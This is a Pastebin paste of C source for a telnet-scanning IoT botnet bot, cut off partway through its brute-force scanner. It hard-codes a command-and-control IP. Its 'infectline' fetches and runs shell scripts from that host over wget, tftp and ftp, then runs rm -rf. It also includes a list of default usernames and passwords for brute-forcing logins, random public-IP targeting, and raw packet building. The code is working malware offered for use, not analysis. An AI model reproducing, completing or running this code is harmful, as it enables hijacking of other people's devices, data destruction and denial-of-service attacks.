Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // ___ __ _
- // / \___ / _(_)_ __ ___ ___
- // / /\ / _ \ |_| | '_ \ / _ \/ __|
- // / /_// __/ _| | | | | __/\__ \
- // /___,' \___|_| |_|_| |_|\___||___/
- #define PR_SET_NAME 15
- #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
- #define PAD_RIGHT 1
- #define PAD_ZERO 2
- #define PRINT_BUF_LEN 12
- #define CMD_IAC 255
- #define CMD_WILL 251
- #define CMD_WONT 252
- #define CMD_DO 253
- #define CMD_DONT 254
- #define OPT_SGA 3
- // _____ _ _
- // \_ \_ __ ___| |_ _ __| | ___ ___
- // / /\/ '_ \ / __| | | | |/ _` |/ _ \/ __|
- // /\/ /_ | | | | (__| | |_| | (_| | __/\__ \
- // \____/ |_| |_|\___|_|\__,_|\__,_|\___||___/
- #include <stdlib.h>
- #include <stdarg.h>
- #include <stdio.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netinet/in.h>
- #include <arpa/inet.h>
- #include <netdb.h>
- #include <signal.h>
- #include <strings.h>
- #include <string.h>
- #include <sys/utsname.h>
- #include <unistd.h>
- #include <fcntl.h>
- #include <errno.h>
- #include <netinet/ip.h>
- #include <netinet/udp.h>
- #include <netinet/tcp.h>
- #include <sys/wait.h>
- #include <sys/ioctl.h>
- #include <net/if.h>
- char *infectline = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.88.234.115/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 23.88.234.115 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tf1tp2.sh -g 23.88.234.115; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 23.88.234.115 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit\r\n";
- // WGET LINE GOES HERE ^
- unsigned char *commServer[] =
- {
- "23.88.234.115:118"
- };
- char *useragents[] = {
- "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
- "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
- "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
- "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
- "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
- "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
- "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
- };
- int initConnection();
- int getBogos(unsigned char *bogomips);
- int getCores();
- int getCountry(unsigned char *buf, int bufsize);
- void makeRandomStr(unsigned char *buf, int length);
- int sockprintf(int sock, char *formatStr, ...);
- char *inet_ntoa(struct in_addr in);
- int mainCommSock = 0, currentServer = -1, gotIP = 0;
- uint32_t *pids;
- uint32_t scanPid;
- uint64_t numpids = 0;
- struct in_addr ourIP;
- unsigned char macAddress[6] = {0};
- char *usernames[] = {"root\0", "admin\0", "user\0", "login\0", "guest\0", "support\0", "cisco\0","ubunt","toor\0"};
- char *passwords[] = {"root\0", "toor\0", "admin\0", "user\0", "guest\0", "login\0", "changeme\0", "1234\0", "12345\0", "123456\0", "default\0", "pass\0", "password\0", "support\0", "vizxv\0", "cisco\0","ubunt"};
- #define PHI 0x9e3779b9
- static uint32_t Q[4096], c = 362436;
- void init_rand(uint32_t x)
- {
- int i;
- Q[0] = x;
- Q[1] = x + PHI;
- Q[2] = x + PHI + PHI;
- for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
- }
- uint32_t rand_cmwc(void)
- {
- uint64_t t, a = 18782LL;
- static uint32_t i = 4095;
- uint32_t x, r = 0xfffffffe;
- i = (i + 1) & 4095;
- t = a * Q[i] + c;
- c = (uint32_t)(t >> 32);
- x = t + c;
- if (x < c) {
- x++;
- c++;
- }
- return (Q[i] = r - x);
- }
- void trim(char *str)
- {
- int i;
- int begin = 0;
- int end = strlen(str) - 1;
- while (isspace(str[begin])) begin++;
- while ((end >= begin) && isspace(str[end])) end--;
- for (i = begin; i <= end; i++) str[i - begin] = str[i];
- str[i - begin] = '\0';
- }
- static void printchar(unsigned char **str, int c)
- {
- if (str) {
- **str = c;
- ++(*str);
- }
- else (void)write(1, &c, 1);
- }
- static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
- {
- register int pc = 0, padchar = ' ';
- if (width > 0) {
- register int len = 0;
- register const unsigned char *ptr;
- for (ptr = string; *ptr; ++ptr) ++len;
- if (len >= width) width = 0;
- else width -= len;
- if (pad & PAD_ZERO) padchar = '0';
- }
- if (!(pad & PAD_RIGHT)) {
- for ( ; width > 0; --width) {
- printchar (out, padchar);
- ++pc;
- }
- }
- for ( ; *string ; ++string) {
- printchar (out, *string);
- ++pc;
- }
- for ( ; width > 0; --width) {
- printchar (out, padchar);
- ++pc;
- }
- return pc;
- }
- static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
- {
- unsigned char print_buf[PRINT_BUF_LEN];
- register unsigned char *s;
- register int t, neg = 0, pc = 0;
- register unsigned int u = i;
- if (i == 0) {
- print_buf[0] = '0';
- print_buf[1] = '\0';
- return prints (out, print_buf, width, pad);
- }
- if (sg && b == 10 && i < 0) {
- neg = 1;
- u = -i;
- }
- s = print_buf + PRINT_BUF_LEN-1;
- *s = '\0';
- while (u) {
- t = u % b;
- if( t >= 10 )
- t += letbase - '0' - 10;
- *--s = t + '0';
- u /= b;
- }
- if (neg) {
- if( width && (pad & PAD_ZERO) ) {
- printchar (out, '-');
- ++pc;
- --width;
- }
- else {
- *--s = '-';
- }
- }
- return pc + prints (out, s, width, pad);
- }
- static int print(unsigned char **out, const unsigned char *format, va_list args )
- {
- register int width, pad;
- register int pc = 0;
- unsigned char scr[2];
- for (; *format != 0; ++format) {
- if (*format == '%') {
- ++format;
- width = pad = 0;
- if (*format == '\0') break;
- if (*format == '%') goto out;
- if (*format == '-') {
- ++format;
- pad = PAD_RIGHT;
- }
- while (*format == '0') {
- ++format;
- pad |= PAD_ZERO;
- }
- for ( ; *format >= '0' && *format <= '9'; ++format) {
- width *= 10;
- width += *format - '0';
- }
- if( *format == 's' ) {
- register char *s = (char *)va_arg( args, int );
- pc += prints (out, s?s:"(null)", width, pad);
- continue;
- }
- if( *format == 'd' ) {
- pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
- continue;
- }
- if( *format == 'x' ) {
- pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
- continue;
- }
- if( *format == 'X' ) {
- pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
- continue;
- }
- if( *format == 'u' ) {
- pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
- continue;
- }
- if( *format == 'c' ) {
- scr[0] = (unsigned char)va_arg( args, int );
- scr[1] = '\0';
- pc += prints (out, scr, width, pad);
- continue;
- }
- }
- else {
- out:
- printchar (out, *format);
- ++pc;
- }
- }
- if (out) **out = '\0';
- va_end( args );
- return pc;
- }
- int zprintf(const unsigned char *format, ...)
- {
- va_list args;
- va_start( args, format );
- return print( 0, format, args );
- }
- int szprintf(unsigned char *out, const unsigned char *format, ...)
- {
- va_list args;
- va_start( args, format );
- return print( &out, format, args );
- }
- int sockprintf(int sock, char *formatStr, ...)
- {
- unsigned char *textBuffer = malloc(2048);
- memset(textBuffer, 0, 2048);
- char *orig = textBuffer;
- va_list args;
- va_start(args, formatStr);
- print(&textBuffer, formatStr, args);
- va_end(args);
- orig[strlen(orig)] = '\n';
- zprintf("buf: %s\n", orig);
- int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
- free(orig);
- return q;
- }
- static int *fdopen_pids;
- int fdpopen(unsigned char *program, register unsigned char *type)
- {
- register int iop;
- int pdes[2], fds, pid;
- if (*type != 'r' && *type != 'w' || type[1]) return -1;
- if (pipe(pdes) < 0) return -1;
- if (fdopen_pids == NULL) {
- if ((fds = getdtablesize()) <= 0) return -1;
- if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;
- memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));
- }
- switch (pid = vfork())
- {
- case -1:
- close(pdes[0]);
- close(pdes[1]);
- return -1;
- case 0:
- if (*type == 'r') {
- if (pdes[1] != 1) {
- dup2(pdes[1], 1);
- close(pdes[1]);
- }
- close(pdes[0]);
- } else {
- if (pdes[0] != 0) {
- (void) dup2(pdes[0], 0);
- (void) close(pdes[0]);
- }
- (void) close(pdes[1]);
- }
- execl("/bin/sh", "sh", "-c", program, NULL);
- _exit(127);
- }
- if (*type == 'r') {
- iop = pdes[0];
- (void) close(pdes[1]);
- } else {
- iop = pdes[1];
- (void) close(pdes[0]);
- }
- fdopen_pids[iop] = pid;
- return (iop);
- }
- int fdpclose(int iop)
- {
- register int fdes;
- sigset_t omask, nmask;
- int pstat;
- register int pid;
- if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);
- (void) close(iop);
- sigemptyset(&nmask);
- sigaddset(&nmask, SIGINT);
- sigaddset(&nmask, SIGQUIT);
- sigaddset(&nmask, SIGHUP);
- (void) sigprocmask(SIG_BLOCK, &nmask, &omask);
- do {
- pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);
- } while (pid == -1 && errno == EINTR);
- (void) sigprocmask(SIG_SETMASK, &omask, NULL);
- fdopen_pids[fdes] = 0;
- return (pid == -1 ? -1 : WEXITSTATUS(pstat));
- }
- unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
- {
- int got = 1, total = 0;
- while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
- return got == 0 ? NULL : buffer;
- }
- static const long hextable[] = {
- [0 ... 255] = -1,
- ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
- ['A'] = 10, 11, 12, 13, 14, 15,
- ['a'] = 10, 11, 12, 13, 14, 15
- };
- long parseHex(unsigned char *hex)
- {
- long ret = 0;
- while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];
- return ret;
- }
- int wildString(const unsigned char* pattern, const unsigned char* string) {
- switch(*pattern)
- {
- case '\0': return *string;
- case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
- case '?': return !(*string && !wildString(pattern+1, string+1));
- default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
- }
- }
- int getHost(unsigned char *toGet, struct in_addr *i)
- {
- struct hostent *h;
- if((i->s_addr = inet_addr(toGet)) == -1) return 1;
- return 0;
- }
- void uppercase(unsigned char *str)
- {
- while(*str) { *str = toupper(*str); str++; }
- }
- int getBogos(unsigned char *bogomips)
- {
- int cmdline = open("/proc/cpuinfo", O_RDONLY);
- char linebuf[4096];
- while(fdgets(linebuf, 4096, cmdline) != NULL)
- {
- uppercase(linebuf);
- if(strstr(linebuf, "BOGOMIPS") == linebuf)
- {
- unsigned char *pos = linebuf + 8;
- while(*pos == ' ' || *pos == '\t' || *pos == ':') pos++;
- while(pos[strlen(pos)-1] == '\r' || pos[strlen(pos)-1] == '\n') pos[strlen(pos)-1]=0;
- if(strchr(pos, '.') != NULL) *strchr(pos, '.') = 0x00;
- strcpy(bogomips, pos);
- close(cmdline);
- return 0;
- }
- memset(linebuf, 0, 4096);
- }
- close(cmdline);
- return 1;
- }
- int getCores()
- {
- int totalcores = 0;
- int cmdline = open("/proc/cpuinfo", O_RDONLY);
- char linebuf[4096];
- while(fdgets(linebuf, 4096, cmdline) != NULL)
- {
- uppercase(linebuf);
- if(strstr(linebuf, "BOGOMIPS") == linebuf) totalcores++;
- memset(linebuf, 0, 4096);
- }
- close(cmdline);
- return totalcores;
- }
- void makeRandomStr(unsigned char *buf, int length)
- {
- int i = 0;
- for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
- }
- int recvLine(int socket, unsigned char *buf, int bufsize)
- {
- memset(buf, 0, bufsize);
- fd_set myset;
- struct timeval tv;
- tv.tv_sec = 30;
- tv.tv_usec = 0;
- FD_ZERO(&myset);
- FD_SET(socket, &myset);
- int selectRtn, retryCount;
- if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
- while(retryCount < 10)
- {
- sockprintf(mainCommSock, "PING");
- tv.tv_sec = 30;
- tv.tv_usec = 0;
- FD_ZERO(&myset);
- FD_SET(socket, &myset);
- if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
- retryCount++;
- continue;
- }
- break;
- }
- }
- unsigned char tmpchr;
- unsigned char *cp;
- int count = 0;
- cp = buf;
- while(bufsize-- > 1)
- {
- if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
- *cp = 0x00;
- return -1;
- }
- *cp++ = tmpchr;
- if(tmpchr == '\n') break;
- count++;
- }
- *cp = 0x00;
- // zprintf("recv: %s\n", cp);
- return count;
- }
- int connectTimeout(int fd, char *host, int port, int timeout)
- {
- struct sockaddr_in dest_addr;
- fd_set myset;
- struct timeval tv;
- socklen_t lon;
- int valopt;
- long arg = fcntl(fd, F_GETFL, NULL);
- arg |= O_NONBLOCK;
- fcntl(fd, F_SETFL, arg);
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(port);
- if(getHost(host, &dest_addr.sin_addr)) return 0;
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
- if (res < 0) {
- if (errno == EINPROGRESS) {
- tv.tv_sec = timeout;
- tv.tv_usec = 0;
- FD_ZERO(&myset);
- FD_SET(fd, &myset);
- if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
- lon = sizeof(int);
- getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
- if (valopt) return 0;
- }
- else return 0;
- }
- else return 0;
- }
- arg = fcntl(fd, F_GETFL, NULL);
- arg &= (~O_NONBLOCK);
- fcntl(fd, F_SETFL, arg);
- return 1;
- }
- int listFork()
- {
- uint32_t parent, *newpids, i;
- parent = fork();
- if (parent <= 0) return parent;
- numpids++;
- newpids = (uint32_t*)malloc((numpids + 1) * 4);
- for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
- newpids[numpids - 1] = parent;
- free(pids);
- pids = newpids;
- return parent;
- }
- int negotiate(int sock, unsigned char *buf, int len)
- {
- unsigned char c;
- switch (buf[1]) {
- case CMD_IAC: /*dropped an extra 0xFF wh00ps*/ return 0;
- case CMD_WILL:
- case CMD_WONT:
- case CMD_DO:
- case CMD_DONT:
- c = CMD_IAC;
- send(sock, &c, 1, MSG_NOSIGNAL);
- if (CMD_WONT == buf[1]) c = CMD_DONT;
- else if (CMD_DONT == buf[1]) c = CMD_WONT;
- else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
- else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
- send(sock, &c, 1, MSG_NOSIGNAL);
- send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
- break;
- default:
- break;
- }
- return 0;
- }
- int matchPrompt(char *bufStr)
- {
- char *prompts = ":>%$#\0";
- int bufLen = strlen(bufStr);
- int i, q = 0;
- for(i = 0; i < strlen(prompts); i++)
- {
- while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
- if(*(bufStr + bufLen - q) == prompts[i]) return 1;
- }
- return 0;
- }
- int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
- {
- int bufferUsed = initialIndex, got = 0, found = 0;
- fd_set myset;
- struct timeval tv;
- tv.tv_sec = timeout;
- tv.tv_usec = timeoutusec;
- unsigned char *initialRead = NULL;
- while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
- {
- FD_ZERO(&myset);
- FD_SET(fd, &myset);
- if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
- initialRead = buffer + bufferUsed;
- got = recv(fd, initialRead, 1, 0);
- if(got == -1 || got == 0) return 0;
- bufferUsed += got;
- if(*initialRead == 0xFF)
- {
- got = recv(fd, initialRead + 1, 2, 0);
- if(got == -1 || got == 0) return 0;
- bufferUsed += got;
- if(!negotiate(fd, initialRead, 3)) return 0;
- } else {
- if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
- }
- }
- if(found) return 1;
- return 0;
- }
- static uint8_t ipState[5];
- in_addr_t getRandomPublicIP()
- {
- if(ipState[1] < 255 && ipState[2] < 255 && ipState[3] < 255 && ipState[4] < 255)
- {
- ipState[1]++;
- ipState[2]++;
- ipState[3]++;
- ipState[4]++;
- char ip[16];
- szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
- return inet_addr(ip);
- }
- ipState[1] = 0;
- ipState[2] = 0;
- ipState[3] = 0;
- ipState[4] = 0;
- while(
- (ipState[1] == 0) ||
- (ipState[1] == 10) ||
- (ipState[1] == 100 && (ipState[2] >= 64 && ipState[2] <= 127)) ||
- (ipState[1] == 127) ||
- (ipState[1] == 169 && ipState[2] == 254) ||
- (ipState[1] == 172 && (ipState[2] <= 16 && ipState[2] <= 31)) ||
- (ipState[1] == 192 && ipState[2] == 0 && ipState[3] == 2) ||
- (ipState[1] == 192 && ipState[2] == 88 && ipState[3] == 99) ||
- (ipState[1] == 192 && ipState[2] == 168) ||
- (ipState[1] == 198 && (ipState[2] == 18 || ipState[2] == 19)) ||
- (ipState[1] == 198 && ipState[2] == 51 && ipState[3] == 100) ||
- (ipState[1] == 203 && ipState[2] == 0 && ipState[3] == 113) ||
- (ipState[1] >= 224)
- )
- {
- ipState[1] = rand() % 150;
- ipState[2] = rand() % 150;
- ipState[3] = rand() % 150;
- ipState[4] = rand() % 150;
- }
- char ip[16];
- szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
- return inet_addr(ip);
- }
- in_addr_t getRandomIP(in_addr_t netmask)
- {
- in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
- return tmp ^ ( rand_cmwc() & ~netmask);
- }
- unsigned short csum (unsigned short *buf, int count)
- {
- register uint64_t sum = 0;
- while( count > 1 ) { sum += *buf++; count -= 2; }
- if(count > 0) { sum += *(unsigned char *)buf; }
- while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
- return (uint16_t)(~sum);
- }
- unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
- {
- struct tcp_pseudo
- {
- unsigned long src_addr;
- unsigned long dst_addr;
- unsigned char zero;
- unsigned char proto;
- unsigned short length;
- } pseudohead;
- unsigned short total_len = iph->tot_len;
- pseudohead.src_addr=iph->saddr;
- pseudohead.dst_addr=iph->daddr;
- pseudohead.zero=0;
- pseudohead.proto=IPPROTO_TCP;
- pseudohead.length=htons(sizeof(struct tcphdr));
- int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
- unsigned short *tcp = malloc(totaltcp_len);
- memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
- memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
- unsigned short output = csum(tcp,totaltcp_len);
- free(tcp);
- return output;
- }
- void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
- {
- iph->ihl = 5;
- iph->version = 4;
- iph->tos = 0;
- iph->tot_len = sizeof(struct iphdr) + packetSize;
- iph->id = rand_cmwc();
- iph->frag_off = 0;
- iph->ttl = MAXTTL;
- iph->protocol = protocol;
- iph->check = 0;
- iph->saddr = source;
- iph->daddr = dest;
- }
- int sclose(int fd)
- {
- if(3 > fd) return 1;
- close(fd);
- return 0;
- }
- void StartTheLelz()
- {
- int max = (getdtablesize() / 4) * 3, i, res;
- fd_set myset;
- struct timeval tv;
- socklen_t lon;
- int valopt;
- max = max > 4096 ? 4096 : max;
- struct sockaddr_in dest_addr;
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(23);
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- struct telstate_t
- {
- int fd;
- uint32_t ip;
- uint8_t state;
- uint8_t complete;
- uint8_t usernameInd;
- uint8_t passwordInd;
- uint32_t totalTimeout;
- uint16_t bufUsed;
- char *sockbuf;
- } fds[max];
- memset(fds, 0, max * (sizeof(int) + 1));
- for(i = 0; i < max; i++) { fds[i].complete = 1; fds[i].sockbuf = malloc(1024); memset(fds[i].sockbuf, 0, 1024); }
- struct timeval timeout;
- timeout.tv_sec = 5;
- timeout.tv_usec = 0;
- while(1)
- {
- for(i = 0; i < max; i++)
- {
- switch(fds[i].state)
- {
- case 0:
- {
- memset(fds[i].sockbuf, 0, 1024);
- if(fds[i].complete) { char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; fds[i].ip = getRandomPublicIP(); }
- else {
- fds[i].passwordInd++;
- if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].passwordInd = 0; fds[i].usernameInd++; }
- if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; }
- }
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(23);
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- dest_addr.sin_addr.s_addr = fds[i].ip;
- fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
- setsockopt (fds[i].fd, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout));
- setsockopt (fds[i].fd, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout));
- if(fds[i].fd == -1) { continue; }
- fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
- if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { /*printf("close %lu\n",fds[i].ip);*/ sclose(fds[i].fd); fds[i].complete = 1; }
- else { fds[i].state = 1; fds[i].totalTimeout = 0; }
- }
- break;
- case 1:
- {
- if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
- FD_ZERO(&myset);
- FD_SET(fds[i].fd,
Add Comment
Please, Sign In to add comment